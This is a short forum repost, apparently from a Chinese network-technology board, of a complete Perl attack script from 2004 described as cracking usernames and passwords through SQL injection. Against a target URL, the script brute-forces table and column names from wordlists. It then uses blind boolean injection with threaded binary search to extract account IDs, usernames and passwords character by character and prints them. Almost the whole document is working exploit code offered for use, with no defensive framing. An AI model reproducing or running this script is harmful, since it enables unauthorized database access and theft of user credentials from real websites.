信息来源:网络技术论坛
代码
复制内容到剪贴板
代码:
#!/usr/local/ActivePerl-5.8/bin/perl -w
use IO::Socket;
use threads;
#函数列表;
sub gethost
{
if($url=~/(http:\/\/)?(.+?)\/(.+)/)
{
$host=$2;
$path='/'.$3;
if($host=~/(.*):(.*)/)
{
$host=$1;
$port=$2;
}
}
}
sub fieInput
{
my $field;
open (fieInput,"$_[0]") or die "can't open file!\n";
while (chomp(my $input=<fieInput>))
{
my $sql="exists%20(select%20$input%20from%20$table_user)";
$path1 = "%20AND%20$sql";
my @res = &connect;
if ("@res"=~/$info/)
{
$field=$input;
print "\t+-- $field --+";
last;
}
}
close(fieInput);
return $field;
}
sub tabInput
{
my $table;
open (tabInput,"$_[0]") or die "can't open file!\n";
while (chomp(my $input=<tabInput>))
{
my $sql="0<>(select%20count(*)%20from%20$input)";
$path1 = "%20AND%20$sql";
my @res = &connect;
if ("@res"=~/$info/)
{
$table=$input;
print "\t+-- $table --+\n";
last;
}
}
close(tabInput);
return $table;
}
sub connect
{
$req = "GET $path$path1 HTTP/1.0\n".
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) ││ die "Sorry! Could not connect to $host \n";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub crack
{
my(@dic) = @_;
my $sql=pop(@dic);
my $i=0;
my $op=1;
my $crack;
foreach my $pass(@dic)
{
print ">";
$i++;
$crack+=$op*$pass;
$path1 = "%20AND%20$crack<($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$op=1;
if($i==@dic)
{
$crack++;
}
}
else
{
$op=-1;
}
}
return $crack;
}
sub asc
{
my $asc=$_[0];
my $str;
if ($asc<256)
{
$str = pack('C*',$asc);
}
else
{
$asc*=-1;
$str = sprintf("%X",$asc);
if ($str=~/(.{4})$/i)
{
$str=$1;
}
$str = pack("H*",$str);
}
return $str;
}
#初始化变量;
$url='';
$host='';
$path='';
$info='';
$port=80;
@dic1=(128,64,32,16,8,4,2,1);
@dic2=(16,8,4,2,1);
@dic3=(64,32,16,8,4,2,1);
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1);
print "\n\n";
print "\t* The script Crack user&pass for Sql-injection system *\n";
print "\t* hemon @ East China Jiaotong Univercity , 2004.5 *\n";
print "\t* E-mail : the108one @ yahoo.com.cn QQ :24303484 *\n";
#取得主机地址、路径;
$ARGC = @ARGV;
$url = $ARGV[0];
$info = $ARGV[1];
if ($ARGC != 2)
{
print "\n\t* Please input the url : *\n";
chomp($url=<STDIN>);
print "\n\t* Please input the infomation : *\n";
chomp($info=<STDIN>);
}
&gethost;
print "\n\n开始在 $host 上进行测试,请等待......\n\n";
#猜解;
print "+-- Table --+";
$table_user=&tabInput('table_user.txt');
print "+-- Filed --+";
my $thread1 = threads->create("fieInput","field_Username.txt");
my $thread2 = threads->create("fieInput","field_password.txt");
my $thread3 = threads->create("fieInput","field_id.txt");
$field_Username = $thread1->join();
$field_password = $thread2->join();
$field_id = $thread3->join();
print "\n\n";
$sql="select%20min($field_id)%20from%20$table_user";
$id=&crack(@dic1,"$sql");
$sql="select%20len($field_Username)%20from%20$table_user%20where%20$field_id=$id";
my $thread4 = threads->create("crack",@dic2,$sql);
$sql="select%20len($field_password)%20from%20$table_user%20where%20$field_id=$id";
my $thread5 = threads->create("crack",@dic2,$sql);
$userlen = $thread4->join();
$passlen = $thread5->join();
for (my $locat=1;$locat<=$userlen;$locat++)
{
$sql="select%20asc(mid($field_Username,$locat,1))%20from%20$table_user%20where%20$field_id=$id";
$path1 = "%20AND%200>($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$sql="select%20abs(asc(mid($field_Username,$locat,1)))%20from%20$table_user%20where%20$field_id=$id";
$username[$locat] = threads->create("crack",@dic4,$sql);
}
else
{
$username[$locat] = threads->create("crack",@dic3,$sql);
}
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
$sql = "select%20asc(mid($field_password,$locat,1))%20from%20$table_user%20where%20$field_id=$id";
$path1 = "%20AND%200>($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$sql="select%20abs(asc(mid($field_password,$locat,1)))%20from%20$table_user%20where%20$field_id=$id";
$password[$locat] = threads->create("crack",@dic4,$sql);
}
else
{
$password[$locat] = threads->create("crack",@dic3,$sql);
}
}
for (my $locat=1;$locat<=$userlen;$locat++)
{
$username[$locat] = $username[$locat]->join();
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = $password[$locat]->join();
}
print "\n\n\t+-- $field_Username --+\t";
for (my $locat=1;$locat<=$userlen;$locat++)
{
$username[$locat] = &asc($username[$locat]);
print "$username[$locat]";
}
print "\n\t+-- $field_password --+\t";
for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = &asc($password[$locat]);
print "$password[$locat]";
}
print "\n\n";
system('pause');
